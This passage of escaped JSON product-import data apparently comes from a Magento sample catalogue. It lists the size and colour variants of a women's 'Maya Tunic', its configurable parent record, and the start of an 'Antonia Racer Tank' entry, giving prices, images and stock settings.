:\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},\"1726\":{\"sku\":\"WT07-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Maya Tunic-M-Yellow\",\"description\":\"<p>With abutted seams and moisture wicking capacity, the Maya Tunic lets you work out in complete comfort.<\\/p>\\n<p>&bull; Mint green heather tunic-style tank. <br \\/>&bull; Wrapped back with cut out detail.<br \\/>&bull; Drawcord detail at end.<br \\/>&bull; Abutted seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maya-tunic-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1727\":{\"sku\":\"WT07-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Maya Tunic-L-Green\",\"description\":\"<p>With abutted seams and moisture wicking capacity, the Maya Tunic lets you work out in complete comfort.<\\/p>\\n<p>&bull; Mint green heather tunic-style tank. <br \\/>&bull; Wrapped back with cut out detail.<br \\/>&bull; Drawcord detail at end.<br \\/>&bull; Abutted seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maya-tunic-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt07-green_alt1.jpg,\\/w\\/t\\/wt07-green_back.jpg\",\"image\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt07-green_alt1.jpg,\\/w\\/t\\/wt07-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1728\":{\"sku\":\"WT07-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Maya Tunic-L-White\",\"description\":\"<p>With abutted seams and moisture wicking capacity, the Maya Tunic lets you work out in complete comfort.<\\/p>\\n<p>&bull; Mint green heather tunic-style tank. <br \\/>&bull; Wrapped back with cut out detail.<br \\/>&bull; Drawcord detail at end.<br \\/>&bull; Abutted seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maya-tunic-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},\"1729\":{\"sku\":\"WT07-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Maya Tunic-L-Yellow\",\"description\":\"<p>With abutted seams and moisture wicking capacity, the Maya Tunic lets you work out in complete comfort.<\\/p>\\n<p>&bull; Mint green heather tunic-style tank. <br \\/>&bull; Wrapped back with cut out detail.<br \\/>&bull; Drawcord detail at end.<br \\/>&bull; Abutted seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maya-tunic-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1730\":{\"sku\":\"WT07-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Maya Tunic-XL-Green\",\"description\":\"<p>With abutted seams and moisture wicking capacity, the Maya Tunic lets you work out in complete comfort.<\\/p>\\n<p>&bull; Mint green heather tunic-style tank. <br \\/>&bull; Wrapped back with cut out detail.<br \\/>&bull; Drawcord detail at end.<br \\/>&bull; Abutted seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maya-tunic-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt07-green_alt1.jpg,\\/w\\/t\\/wt07-green_back.jpg\",\"image\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt07-green_alt1.jpg,\\/w\\/t\\/wt07-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1731\":{\"sku\":\"WT07-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Maya Tunic-XL-White\",\"description\":\"<p>With abutted seams and moisture wicking capacity, the Maya Tunic lets you work out in complete comfort.<\\/p>\\n<p>&bull; Mint green heather tunic-style tank. <br \\/>&bull; Wrapped back with cut out detail.<br \\/>&bull; Drawcord detail at end.<br \\/>&bull; Abutted seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maya-tunic-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},\"1732\":{\"sku\":\"WT07-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Maya Tunic-XL-Yellow\",\"description\":\"<p>With abutted seams and moisture wicking capacity, the Maya Tunic lets you work out in complete comfort.<\\/p>\\n<p>&bull; Mint green heather tunic-style tank. <br \\/>&bull; Wrapped back with cut out detail.<br \\/>&bull; Drawcord detail at end.<br \\/>&bull; Abutted seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maya-tunic-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt07-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1733\":{\"sku\":\"WT07\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Maya Tunic\",\"description\":\"<p>With abutted seams and moisture wicking capacity, the Maya Tunic lets you work out in complete comfort.<\\/p>\\n<p>&bull; Mint green heather tunic-style tank. <br \\/>&bull; Wrapped back with cut out detail.<br \\/>&bull; Drawcord detail at end.<br \\/>&bull; Abutted seams.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=Cocona&reg; performance fabric|Organic Cotton,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WT07-XS-Green,size=XS,color=Green|sku=WT07-XS-White,size=XS,color=White|sku=WT07-XS-Yellow,size=XS,color=Yellow|sku=WT07-S-Green,size=S,color=Green|sku=WT07-S-White,size=S,color=White|sku=WT07-S-Yellow,size=S,color=Yellow|sku=WT07-M-Green,size=M,color=Green|sku=WT07-M-White,size=M,color=White|sku=WT07-M-Yellow,size=M,color=Yellow|sku=WT07-L-Green,size=L,color=Green|sku=WT07-L-White,size=L,color=White|sku=WT07-L-Yellow,size=L,color=Yellow|sku=WT07-XL-Green,size=XL,color=Green|sku=WT07-XL-White,size=XL,color=White|sku=WT07-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt07-green_alt1.jpg,\\/w\\/t\\/wt07-green_back.jpg\",\"image\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt07-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt07-green_alt1.jpg,\\/w\\/t\\/wt07-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank\",\"material\":\"Cocona&reg; performance fabric|Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1734\":{\"sku\":\"WT08-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-XS-Black\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\